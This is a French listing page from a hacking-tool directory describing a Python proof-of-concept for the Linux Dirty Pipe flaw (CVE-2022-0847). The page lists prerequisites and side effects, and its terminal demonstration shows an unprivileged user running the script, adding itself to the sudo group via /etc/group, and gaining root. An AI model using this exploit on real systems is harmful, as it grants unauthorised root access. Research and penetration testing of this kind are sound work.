Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
dirty-pipe-poc — Exploit POC pour ajouter un utilisateur à Sudo pour la vulnérabilité Dirty Pipe (CVE-2022-0847) | Kitploit
Outils/GitHubGitHub/0xeremus/dirty-pipe-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHub0xeremus/dirty-pipe-poc

dirty-pipe-poc

Exploit POC pour ajouter un utilisateur à Sudo pour la vulnérabilité Dirty Pipe (CVE-2022-0847)

Voir le dépôt
21il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit POC pour ajouter un utilisateur à Sudo pour la vulnérabilité Dirty Pipe CVE-2022-0847

Ce dépôt est basé sur la vulnérabilité, l'article et l'exploit produits par Max Kellermann, tous trouvés ici.

Comme tout le monde, j'ai dû profiter de l'occasion pour jouer avec l'élévation de privilèges la plus triviale à reproduire au monde ; l'article de blog fait un excellent travail pour tout expliquer. J'ai traduit l'exploit en Python simplement pour mieux le comprendre, mais il s'agit d'une copie exacte de l'exploit en C avec l'élévation de privilèges Sudo codée en dur.

Prérequis

Python 3.10 (en raison de l'utilisation de l'appel os.splice)

Inconvénients

Corrompt le fichier /etc/group en écrivant dans la ligne juste après l'entrée sudo. Mais lorsque vous êtes root, vous pouvez le réparer en utilisant la copie.

Place une copie de /etc/group dans /tmp/group_backup

Démonstration

root@kitploit:~
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file.  This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$
Télécharger l’outil